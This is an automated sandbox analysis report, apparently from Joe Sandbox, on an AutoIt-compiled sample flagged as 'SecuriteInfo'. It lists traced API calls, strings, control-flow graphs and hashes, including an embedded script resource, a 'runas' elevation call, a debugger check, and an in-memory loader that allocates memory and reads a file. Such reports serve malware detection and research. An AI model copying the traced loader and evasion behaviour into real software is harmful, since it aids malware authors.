99235->99238 99236->99234 99239 781059 99237->99239 99241 781083 __read LeaveCriticalSection 99238->99241 99240 778d34 __read_nolock 58 API calls 99239->99240 99240->99238 99241->99234 99242->99159 99243->99158 99244->99162 99248 77543a GetSystemTimeAsFileTime 99245->99248 99247 7b91f8 99247->98837 99249 775468 __aulldiv 99248->99249 99249->99247 99251 775e9c __ioinit 99250->99251 99252 775ec3 99251->99252 99253 775eae 99251->99253 99255 776e4e __lock_file 59 API calls 99252->99255 99264 778d68 58 API calls __getptd_noexit 99253->99264 99257 775ec9 99255->99257 99256 775eb3 99265 778ff6 9 API calls _memcpy_s 99256->99265 99266 775b00 67 API calls 6 library calls 99257->99266 99260 775ed4 99267 775ef4 LeaveCriticalSection LeaveCriticalSection _fprintf 99260->99267 99262 775ee6 99263 775ebe 
__ioinit 99262->99263 99263->98842 99264->99256 99265->99263 99266->99260 99267->99262 99269 7580fa _memmove 99268->99269 99270 7580e7 99268->99270 99269->98699 99270->99269 99271 770ff6 Mailbox 59 API calls 99270->99271 99271->99269 99272->98707 99273->98720 99274->98722 99275->98719 99276->98728 99278 7592c9 Mailbox 99277->99278 99279 78f5c8 99278->99279 99284 7592d3 99278->99284 99280 770ff6 Mailbox 59 API calls 99279->99280 99282 78f5d4 99280->99282 99281 7592da 99281->98734 99282->99282 99284->99281 99285 759df0 59 API calls Mailbox 99284->99285 99285->99284 99286->98743 99287->98738 99291 7b99d2 __tzset_nolock _wcscmp 99288->99291 99289 75506b 74 API calls 99289->99291 99290 7b9393 GetSystemTimeAsFileTime 99290->99291 99291->99289 99291->99290 99292 7b9866 99291->99292 99293 755045 85 API calls 99291->99293 99292->98749 99292->98778 99293->99291 99295 7b8d9b 99294->99295 99296 7b8da9 99294->99296 99297 77548b 115 API calls 99295->99297 99298 7b8dee 99296->99298 99299 77548b 115 API calls 99296->99299 99311 7b8db2 99296->99311 99297->99296 99325 7b901b 99298->99325 99301 7b8dd3 99299->99301 99301->99298 99303 7b8ddc 99301->99303 99302 7b8e32 99304 7b8e57 99302->99304 99305 7b8e36 99302->99305 99307 7755d6 __fcloseall 83 API calls 99303->99307 99303->99311 99329 7b8c33 99304->99329 99306 7b8e43 99305->99306 99310 7755d6 __fcloseall 83 API calls 99305->99310 99306->99311 99314 7755d6 __fcloseall 83 API calls 99306->99314 99307->99311 99310->99306 99311->98777 99312 7b8e85 99338 7b8eb5 99312->99338 99313 7b8e65 99315 7b8e72 99313->99315 99317 7755d6 __fcloseall 83 API calls 99313->99317 99314->99311 99315->99311 99319 7755d6 __fcloseall 83 API calls 99315->99319 99317->99315 99319->99311 99322 7b8ea0 99322->99311 99324 7755d6 __fcloseall 83 API calls 99322->99324 99324->99311 99326 7b9029 __tzset_nolock _memmove 99325->99326 99327 7b9040 99325->99327 99326->99302 99328 775812 __fread_nolock 74 API calls 99327->99328 99328->99326 99330 77594c 
__crtCompareStringA_stat 58 API calls 99329->99330 99331 7b8c42 99330->99331 99332 77594c __crtCompareStringA_stat 58 API calls 99331->99332 99333 7b8c56 99332->99333 99334 77594c __crtCompareStringA_stat 58 API calls 99333->99334 99335 7b8c6a 99334->99335 99336 7b8f97 58 API calls 99335->99336 99337 7b8c7d 99335->99337 99336->99337 99337->99312 99337->99313 99339 7b8eca 99338->99339 99340 7b8f82 99339->99340 99342 7b8e8c 99339->99342 99343 7b8c8f 74 API calls 99339->99343 99371 7b8d2b 74 API calls 99339->99371 99372 7b909c 80 API calls 99339->99372 99367 7b91bf 99340->99367 99346 7b8f97 99342->99346 99343->99339 99347 7b8faa 99346->99347 99348 7b8fa4 99346->99348 99350 7b8fbb 99347->99350 99351 772f95 _free 58 API calls 99347->99351 99349 772f95 _free 58 API calls 99348->99349 99349->99347 99352 7b8e93 99350->99352 99353 772f95 _free 58 API calls 99350->99353 99351->99350 99352->99322 99354 7755d6 99352->99354 99353->99352 99355 7755e2 __ioinit 99354->99355 99356 7755f6 99355->99356 99357 77560e 99355->99357 99454 778d68 58 API calls __getptd_noexit 99356->99454 99360 776e4e __lock_file 59 API calls 99357->99360 99364 775606 __ioinit 99357->99364 99359 7755fb 99455 778ff6 9 API calls _memcpy_s 99359->99455 99362 775620 99360->99362 99438 77556a 99362->99438 99364->99322 99368 7b91cc 99367->99368 99369 7b91dd 99367->99369 99373 774a93 99368->99373 99369->99342 99371->99339 99372->99339 99374 774a9f __ioinit 99373->99374 99375 774ad5 99374->99375 99376 774abd 99374->99376 99378 774acd __ioinit 99374->99378 99379 776e4e __lock_file 59 API calls 99375->99379 99398 778d68 58 API calls __getptd_noexit 99376->99398 99378->99369 99380 774adb 99379->99380 99386 77493a 99380->99386 99381 774ac2 99399 778ff6 9 API calls _memcpy_s 99381->99399 99389 774949 99386->99389 99393 774967 99386->99393 99387 774957 99429 778d68 58 API calls __getptd_noexit 99387->99429 99389->99387 99389->99393 99397 774981 _memmove 99389->99397 99390 77495c 99430 778ff6 9 API calls _memcpy_s 
99390->99430 99400 774b0d LeaveCriticalSection LeaveCriticalSection _fprintf 99393->99400 99395 774916 __fputwc_nolock 58 API calls 99395->99397 99397->99393 99397->99395 99401 77dac6 99397->99401 99431 774c6d 99397->99431 99437 77b05e 78 API calls 7 library calls 99397->99437 99398->99381 99399->99378 99400->99378 99402 77dad2 __ioinit 99401->99402 99403 77daf6 99402->99403 99404 77dadf 99402->99404 99406 77db95 99403->99406 99408 77db0a 99403->99408 99405 778d34 __read_nolock 58 API calls 99404->99405 99407 77dae4 99405->99407 99409 778d34 __read_nolock 58 API calls 99406->99409 99410 778d68 _memcpy_s 58 API calls 99407->99410 99411 77db32 99408->99411 99412 77db28 99408->99412 99413 77db2d 99409->99413 99421 77daeb __ioinit 99410->99421 99414 77d446 ___lock_fhandle 59 API calls 99411->99414 99415 778d34 __read_nolock 58 API calls 99412->99415 99417 778d68 _memcpy_s 58 API calls 99413->99417 99416 77db38 99414->99416 99415->99413 99418 77db5e 99416->99418 99419 77db4b 99416->99419 99420 77dba1 99417->99420 99424 778d68 _memcpy_s 58 API calls 99418->99424 99422 77dbb5 __write_nolock 76 API calls 99419->99422 99423 778ff6 _memcpy_s 9 API calls 99420->99423 99421->99397 99425 77db57 99422->99425 99423->99421 99426 77db63 99424->99426 99428 77db8d __write LeaveCriticalSection 99425->99428 99427 778d34 __read_nolock 58 API calls 99426->99427 99427->99425 99428->99421 99429->99390 99430->99393 99432 774c80 99431->99432 99433 774ca4 99431->99433 99432->99433 99434 774916 __fputwc_nolock 58 API calls 99432->99434 99433->99397 99435 774c9d 99434->99435 99436 77dac6 __write 78 API calls 99435->99436 99436->99433 99437->99397 99439 77558d 99438->99439 99440 775579 99438->99440 99442 775589 99439->99442 99444 774c6d __flush 78 API calls 99439->99444 99487 778d68 58 API calls __getptd_noexit 99440->99487 99456 775645 LeaveCriticalSection LeaveCriticalSection _fprintf 99442->99456 99443 77557e 99488 778ff6 9 API calls _memcpy_s 99443->99488 99446 775599 99444->99446 99457 

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00753B7A
                    • IsDebuggerPresent.KERNEL32 ref: 00753B8C
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,008162F8,008162E0,?,?), ref: 00753BFD
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                      • Part of subcall function 00760A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00753C26,008162F8,?,?,?), ref: 00760ACE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00753C81
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008093F0,00000010), ref: 0078D4BC
                    • SetCurrentDirectoryW.KERNEL32(?,008162F8,?,?,?), ref: 0078D4F4
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00805D40,008162F8,?,?,?), ref: 0078D57A
                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0078D581
                      • Part of subcall function 00753A58: GetSysColorBrush.USER32(0000000F), ref: 00753A62
                      • Part of subcall function 00753A58: LoadCursorW.USER32(00000000,00007F00), ref: 00753A71
                      • Part of subcall function 00753A58: LoadIconW.USER32(00000063), ref: 00753A88
                      • Part of subcall function 00753A58: LoadIconW.USER32(000000A4), ref: 00753A9A
                      • Part of subcall function 00753A58: LoadIconW.USER32(000000A2), ref: 00753AAC
                      • Part of subcall function 00753A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00753AD2
                      • Part of subcall function 00753A58: RegisterClassExW.USER32(?), ref: 00753B28
                      • Part of subcall function 007539E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00753A15
                      • Part of subcall function 007539E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00753A36
                      • Part of subcall function 007539E7: ShowWindow.USER32(00000000,?,?), ref: 00753A4A
                      • Part of subcall function 007539E7: ShowWindow.USER32(00000000,?,?), ref: 00753A53
                      • Part of subcall function 007543DB: _memset.LIBCMT ref: 00754401
                      • Part of subcall function 007543DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007544A6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                    • String ID: This is a third-party compiled AutoIt script.$runas$%~
                    • API String ID: 529118366-536648910

                    Control-flow Graph

                    APIs
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00754EEE,?,?,00000000,00000000), ref: 00754FF9
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00754EEE,?,?,00000000,00000000), ref: 00755010
                    • LoadResource.KERNEL32(?,00000000,?,?,00754EEE,?,?,00000000,00000000,?,?,?,?,?,?,00754F8F), ref: 0078DD60
                    • SizeofResource.KERNEL32(?,00000000,?,?,00754EEE,?,?,00000000,00000000,?,?,?,?,?,?,00754F8F), ref: 0078DD75
                    • LockResource.KERNEL32(Nu,?,?,00754EEE,?,?,00000000,00000000,?,?,?,?,?,?,00754F8F,00000000), ref: 0078DD88
                    Similarity
                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                    • String ID: SCRIPT$Nu
                    • API String ID: 3051347437-3259838383

                    Control-flow Graph

                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 00754B2B
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                    • GetCurrentProcess.KERNEL32(?,007DFAEC,00000000,00000000,?), ref: 00754BF8
                    • IsWow64Process.KERNEL32(00000000), ref: 00754BFF
                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00754C45
                    • FreeLibrary.KERNEL32(00000000), ref: 00754C50
                    • GetSystemInfo.KERNEL32(00000000), ref: 00754C81
                    • GetSystemInfo.KERNEL32(00000000), ref: 00754C8D
                    Similarity
                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                    • String ID:
                    • API String ID: 1986165174-0
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,0078E7C1), ref: 007B46A6
                    • FindFirstFileW.KERNELBASE(?,?), ref: 007B46B7
                    • FindClose.KERNEL32(00000000), ref: 007B46C7
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    Strings
                    • Variable must be of type 'Object'., xrefs: 0079428C
                    Similarity
                    • API ID:
                    • String ID: Variable must be of type 'Object'.
                    • API String ID: 0-109567571
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00760BBB
                    • timeGetTime.WINMM ref: 00760E76
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00760FB3
                    • TranslateMessage.USER32(?), ref: 00760FC7
                    • DispatchMessageW.USER32(?), ref: 00760FD5
                    • Sleep.KERNEL32(0000000A), ref: 00760FDF
                    • LockWindowUpdate.USER32(00000000,?,?), ref: 0076105A
                    • DestroyWindow.USER32 ref: 00761066
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00761080
                    • Sleep.KERNEL32(0000000A,?,?), ref: 007952AD
                    • TranslateMessage.USER32(?), ref: 0079608A
                    • DispatchMessageW.USER32(?), ref: 00796098
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007960AC
                    Similarity
                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                    • API String ID: 4003667617-3242690629

                    Control-flow Graph

                    APIs
                      • Part of subcall function 007B91E9: __time64.LIBCMT ref: 007B91F3
                      • Part of subcall function 00755045: _fseek.LIBCMT ref: 0075505D
                    • __wsplitpath.LIBCMT ref: 007B94BE
                      • Part of subcall function 0077432E: __wsplitpath_helper.LIBCMT ref: 0077436E
                    • _wcscpy.LIBCMT ref: 007B94D1
                    • _wcscat.LIBCMT ref: 007B94E4
                    • __wsplitpath.LIBCMT ref: 007B9509
                    • _wcscat.LIBCMT ref: 007B951F
                    • _wcscat.LIBCMT ref: 007B9532
                      • Part of subcall function 007B922F: _memmove.LIBCMT ref: 007B9268
                      • Part of subcall function 007B922F: _memmove.LIBCMT ref: 007B9277
                    • _wcscmp.LIBCMT ref: 007B9479
                      • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AAE
                      • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AC1
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007B96DC
                    • _wcsncpy.LIBCMT ref: 007B974F
                    • DeleteFileW.KERNEL32(?,?), ref: 007B9785
                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007B979B
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007B97AC
                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007B97BE
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                    • String ID:
                    • API String ID: 1500180987-0

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00753074
                    • RegisterClassExW.USER32(00000030), ref: 0075309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                    • LoadIconW.USER32(000000A9), ref: 007530F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00753074
                    • RegisterClassExW.USER32(00000030), ref: 0075309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                    • LoadIconW.USER32(000000A9), ref: 007530F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00754864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008162F8,?,007537C0,?), ref: 00754882
                      • Part of subcall function 0077074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007572C5), ref: 00770771
                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00757308
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0078ECF1
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0078ED32
                    • RegCloseKey.ADVAPI32(?), ref: 0078ED70
                    • _wcscat.LIBCMT ref: 0078EDC9
                    Similarity
                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                    • API String ID: 2673923337-2727554177

                    Control-flow Graph

                    APIs
                    • DefWindowProcW.USER32(?,?,?,?), ref: 007536D2
                    • KillTimer.USER32(?,00000001), ref: 007536FC
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0075371F
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0075372A
                    • CreatePopupMenu.USER32 ref: 0075373E
                    • PostQuitMessage.USER32(00000000), ref: 0075375F
                    Similarity
                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                    • String ID: TaskbarCreated$%~
                    • API String ID: 129472671-4286669069

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00753A62
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00753A71
                    • LoadIconW.USER32(00000063), ref: 00753A88
                    • LoadIconW.USER32(000000A4), ref: 00753A9A
                    • LoadIconW.USER32(000000A2), ref: 00753AAC
                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00753AD2
                    • RegisterClassExW.USER32(?), ref: 00753B28
                      • Part of subcall function 00753041: GetSysColorBrush.USER32(0000000F), ref: 00753074
                      • Part of subcall function 00753041: RegisterClassExW.USER32(00000030), ref: 0075309E
                      • Part of subcall function 00753041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                      • Part of subcall function 00753041: InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                      • Part of subcall function 00753041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                      • Part of subcall function 00753041: LoadIconW.USER32(000000A9), ref: 007530F2
                      • Part of subcall function 00753041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                    Similarity
                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                    • String ID: #$0$AutoIt v3
                    • API String ID: 423443420-4155596026

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                    • API String ID: 1825951767-3513169116
                    • Opcode ID: 52bdfa86cf4396406757f882574dfa994383b771ba63399d56cb558485d61f14
                    • Instruction ID: 1ed4f583484687dd6ec54dd0508a2fc96599742552a223528e666c62dc3c5a2d
                    • Opcode Fuzzy Hash: 52bdfa86cf4396406757f882574dfa994383b771ba63399d56cb558485d61f14
                    • Instruction Fuzzy Hash: 78A13E71D1022DDACB04EBA0CC9ADEEB778BF14341F444529E916B7191EFB96A0DCB60

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 953 36c25f0-36c269e call 36c0000 956 36c26a5-36c26cb call 36c3500 CreateFileW 953->956 959 36c26cd 956->959 960 36c26d2-36c26e2 956->960 961 36c281d-36c2821 959->961 967 36c26e9-36c2703 VirtualAlloc 960->967 968 36c26e4 960->968 963 36c2863-36c2866 961->963 964 36c2823-36c2827 961->964 969 36c2869-36c2870 963->969 965 36c2829-36c282c 964->965 966 36c2833-36c2837 964->966 965->966 970 36c2839-36c2843 966->970 971 36c2847-36c284b 966->971 972 36c270a-36c2721 ReadFile 967->972 973 36c2705 967->973 968->961 974 36c28c5-36c28da 969->974 975 36c2872-36c287d 969->975 970->971 978 36c284d-36c2857 971->978 979 36c285b 971->979 980 36c2728-36c2768 VirtualAlloc 972->980 981 36c2723 972->981 973->961 976 36c28dc-36c28e7 VirtualFree 974->976 977 36c28ea-36c28f2 974->977 982 36c287f 975->982 983 36c2881-36c288d 975->983 976->977 978->979 979->963 984 36c276f-36c278a call 36c3750 980->984 985 36c276a 980->985 981->961 982->974 986 36c288f-36c289f 983->986 987 36c28a1-36c28ad 983->987 993 36c2795-36c279f 984->993 985->961 988 36c28c3 986->988 989 36c28af-36c28b8 987->989 990 36c28ba-36c28c0 987->990 988->969 989->988 990->988 994 36c27a1-36c27d0 call 36c3750 993->994 995 36c27d2-36c27e6 call 36c3560 993->995 994->993 1001 36c27e8 995->1001 1002 36c27ea-36c27ee 995->1002 1001->961 1003 36c27fa-36c27fe 1002->1003 1004 36c27f0-36c27f4 FindCloseChangeNotification 1002->1004 1005 36c280e-36c2817 1003->1005 1006 36c2800-36c280b VirtualFree 1003->1006 1004->1003 1005->956 1005->961 1006->1005
                    APIs
                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 036C26C1
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 036C28E7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2110433162.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_36c0000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CreateFileFreeVirtual
                    • String ID:
                    • API String ID: 204039940-0
                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                    • Instruction ID: a2329f80c3a695f2727f81d7af7720e81c945896d5af418f34ca61a0e17677c6
                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                    • Instruction Fuzzy Hash: C0A11674E11248EBDF14CBA4C9A8BAEB7B5FF48704F20855DE501BB280C7759A85CFA4

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1074 7539e7-753a57 CreateWindowExW * 2 ShowWindow * 2
                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00753A15
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00753A36
                    • ShowWindow.USER32(00000000,?,?), ref: 00753A4A
                    • ShowWindow.USER32(00000000,?,?), ref: 00753A53
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: 83180fe927729d2129d5fb5a4eb14bdd8c8d570c6ac7e6d33ffe8299f7d65ab2
                    • Instruction ID: 7d533b84a6f6290bf85d85d2401eb5124ac854660e556e1b783989b08593f151
                    • Opcode Fuzzy Hash: 83180fe927729d2129d5fb5a4eb14bdd8c8d570c6ac7e6d33ffe8299f7d65ab2
                    • Instruction Fuzzy Hash: D5F03A706012907EEA3017236C08FA72F7DEBC6F60B01802AF900E2270D2B91821CAB0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1075 36c23b0-36c24eb call 36c0000 call 36c22a0 CreateFileW 1082 36c24ed 1075->1082 1083 36c24f2-36c2502 1075->1083 1084 36c25a2-36c25a7 1082->1084 1086 36c2509-36c2523 VirtualAlloc 1083->1086 1087 36c2504 1083->1087 1088 36c2525 1086->1088 1089 36c2527-36c253e ReadFile 1086->1089 1087->1084 1088->1084 1090 36c2540 1089->1090 1091 36c2542-36c257c call 36c22e0 call 36c12a0 1089->1091 1090->1084 1096 36c257e-36c2593 call 36c2330 1091->1096 1097 36c2598-36c25a0 ExitProcess 1091->1097 1096->1097 1097->1084
                    APIs
                      • Part of subcall function 036C22A0: Sleep.KERNELBASE(000001F4), ref: 036C22B1
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 036C24E1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2110433162.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_36c0000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: 8R8SHE08XIMXV7ADOFLI
                    • API String ID: 2694422964-732184129
                    • Opcode ID: f285965c183fbfde3d2339b00fd4117e1bb8d2def8b125b2a121dfbedf1336cc
                    • Instruction ID: 2e94428622c3c58ef047c6e958f3f5893e29935a666b5087a2de97e04dcb4e86
                    • Opcode Fuzzy Hash: f285965c183fbfde3d2339b00fd4117e1bb8d2def8b125b2a121dfbedf1336cc
                    • Instruction Fuzzy Hash: F8518F70D14288EAEF11DBA4C825BEFBB79AF15300F00459DE609BB2C1D6790B45CBA5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1099 75410d-754123 1100 754200-754204 1099->1100 1101 754129-75413e call 757b76 1099->1101 1104 754144-754164 call 757d2c 1101->1104 1105 78d5dd-78d5ec LoadStringW 1101->1105 1108 78d5f7-78d60f call 757c8e call 757143 1104->1108 1109 75416a-75416e 1104->1109 1105->1108 1119 75417e-7541fb call 773020 call 75463e call 772ffc Shell_NotifyIconW call 755a64 1108->1119 1120 78d615-78d633 call 757e0b call 757143 call 757e0b 1108->1120 1111 754205-75420e call 7581a7 1109->1111 1112 754174-754179 call 757c8e 1109->1112 1111->1119 1112->1119 1119->1100 1120->1119
                    APIs
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0078D5EC
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                    • _memset.LIBCMT ref: 0075418D
                    • _wcscpy.LIBCMT ref: 007541E1
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007541F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 3942752672-1585850449
                    • Opcode ID: b372e05205f2015c37ecd567e51c8383233eea10a4c42684d62a6ac2f22e1061
